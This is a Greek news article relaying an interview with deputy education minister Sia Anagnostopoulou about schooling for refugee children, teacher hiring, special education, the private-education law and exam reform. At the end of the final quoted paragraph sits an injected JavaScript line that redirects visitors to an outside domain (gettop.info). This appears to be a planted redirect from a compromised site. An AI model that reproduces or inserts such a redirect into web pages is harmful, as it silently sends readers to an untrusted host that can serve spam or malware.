Αναγνωστοπούλου: Είμαστε υποχρεωμένοι στην Αριστερά να εντάξουμε τα προσφυγόπουλα στην εκπαίδευση

0
19

 

Σε συνέντευξή της η αναπληρώτρια υπουργός Παιδείας μιλά για την εκπαιδευτική μεταρρύθμιση ενώ προαναγγέλλει την απόφαση της κυβέρνησης να εντάξει τα προσφυγόπουλα που είναι εγκλωβισμένα στην Ελλάδα στο εκπαιδευτικό σύστημα:

«Είμαστε υποχρεωμένοι, απέναντι σε αυτό που λέμε Αριστερά, να εντάξουμε τα παιδιά των μεταναστών που θα μείνουν στην Ελλάδα, ομαλά στο εκπαιδευτικό σύστημα. Η απάντηση μιας κυβέρνησης της Αριστεράς στα κλειστά σύνορα είναι η ίση αντιμετώπιση των παιδιών των μεταναστών, όπως όλων των παιδιών του κόσμου και της Ευρώπης. Από τη στιγμή που θα μείνουν κάποια από αυτά στην Ελλάδα, εμείς είμαστε υποχρεωμένοι, απέναντι σε αυτό που λέμε Αριστερά, να τα εντάξουμε ομαλά στο εκπαιδευτικό σύστημα. Να τους δώσουμε ελπίδα και να μας δώσουν ελπίδα» είπε σε συνέντευξή της στο left.gr.

Όσον αφορά στη νέα σχολική χρονιά που ξεκινά την επόμενη Δευτέρα η υπουργός επεσήμανε: «Στόχος μας είναι να υπάρχουν όλα τα βιβλία από την αρχή στα σχολεία, είναι ήδη όλα τα βιβλία εκεί. Επιπλέον, έχουν γίνει όλες οι διαδικασίες για τις αποσπάσεις και τους αναπληρωτές καθηγητές, ώστε τα σχολεία να ξεκινήσουν 12 Σεπτέμβρη κανονικά, με τους καθηγητές στις θέσεις τους, να μην υπάρχει κλειστό σχολείο».

Σχετικά με τις προσλήψεις διδακτικού προσωπικού, ο υπουργός Νίκος Φίλης έχει εξαγγείλει την πρόσληψη 20.800 αναπληρωτών:

«Ο κύριος Φίλης έχει ήδη δεσμεύσει τα χρήματα για τις προσλήψεις αναπληρωτών που χρειάζονται για αυτήν τη σχολική χρονιά. Έχει πει, όμως, και κάτι επιπλέον ο υπουργός. Στην επόμενη τριετία, αρχής γενομένης από το Σεπτέμβριο του 2017, θα γίνει μόνιμη πρόσληψη όσων χρειάζονται για τη δημόσια εκπαίδευση. Εμείς, ως Αριστερά, αυτό που γίνεται με τους αναπληρωτές, πάντα το καταγγέλλαμε. Είμαστε υποχρεωμένοι να λύσουμε αυτό το ζήτημα».

Στο ζήτημα της ειδικής αγωγής η υπουργός μας λέει:

«Ο υπουργός [Νίκος Φίλης] από πέρυσι έδειξε ιδιαίτερη ευαισθησία για την ειδική αγωγή. Ήδη πέρσι έγιναν πολλές προσλήψεις, οι ίδιες, κάτι περισσότερες από 9.000, θα γίνουν και φέτος».

Όσον αφορά την ιδιωτική εκπαίδευση και τις πρόσφατες νομοθετικές πρωτοβουλίες της κυβέρνησης, που είχαν ως αποτέλεσμα σφοδρή αντιπαράθεση με την αξιωματική αντιπολίτευση, ιδιαίτερα σε σχέση με το άρθρο 28:

«Το άρθρο 28 της ιδιωτικής εκπαίδευσης αποτελεί τομή. Αποτελεί τομή γιατί μια κυβέρνηση, με κύριο κορμό την Αριστερά, βάζει φρένο σε μια απολύτως νεοφιλελεύθερη αντίληψη η οποία προσπαθούσε να μετατρέψει την εκπαίδευση σε εμπόρευμα. Από το 2011 ξεκίνησε αυτή η προσπάθεια, να μετατραπούν οι μαθητές σε «πελάτες» και οι καθηγητές σε «γκαρσόνια των πελατών».

Το νομοσχέδιο σταματάει την «αντιμεταρρύθμιση» στην παιδεία. Η παιδεία είναι δημόσιο αγαθό. Επομένως, οι εκπαιδευτικοί είτε στο δημόσιο είτε στον ιδιωτικό φορέα, είναι λειτουργοί και πρέπει να προστατεύονται με ενιαίο θεσμικό πλαίσιο από το κράτος και να μην είναι όμηροι στα χέρια του κάθε ιδιοκτήτη. Δεν είναι τυχαίο ότι το άρθρο 28 για την ιδιωτική εκπαίδευση το ψήφισαν ΣΥΡΙΖΑ, ΑΝΕΛ, ΚΚΕ, ψήφισαν παρών η Δημοκρατική Συμπαράταξη και το Ποτάμι, και κατά ψήφησαν η ΝΔ και η Χρυσή Αυγή. Δεν περιποιεί τιμή αυτό για τη ΝΔ».

Με το δεδομένο ότι ο Εθνικός και Κοινωνικός Διάλογος για την Παιδεία έχει ολοκληρωθεί και η επιτροπή έχει καταθέσει τα πορίσματά της, η Σία Αναγνωστοπούλου απάντησε στο ποιες είναι οι βασικές τομές που, κατά τη γνώμη της, πρέπει να γίνουν στην παιδεία:

«Η βασική τομή που πρέπει να γίνει είναι να ξαναγίνει το Λύκειο μια κανονική βαθμίδα της εκπαίδευσης και όχι προθάλαμος για τα ανώτατα ιδρύματα. Αυτό θα συμπαρασύρει και αλλαγές που πρέπει να γίνουν στη δευτεροβάθμια και την τριτοβάθμια εκπαίδευση. Το σύστημα των εξετάσεων έχει φτάσει στα όριά του. Δημιούργησε μια υπεραναπτυγμένη παραπαιδεία, φροντιστήρια, παπαγαλία, υπονόμευσε το Λύκειο.

Αυτό όμως που έχουμε πει, και το έχει πει και ο υπουργός, είναι ότι δεν πρόκειται να αιφνιδιάσουμε κανένα. Οι μεταρρυθμίσεις θέλουνε σύνεση, συναίνεση, σοβαρότητα. Δεν πρόκειται να προχωρήσει τίποτα άμεσα που αναστατώνει τις ζωές εφήβων που ετοιμάζονται για τις εξετάσεις. Οι αλλαγές θα γίνουν σε βάθος χρόνου και θα είναι προειδοποιημένοι οι άμεσα ενδιαφερόμενοι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here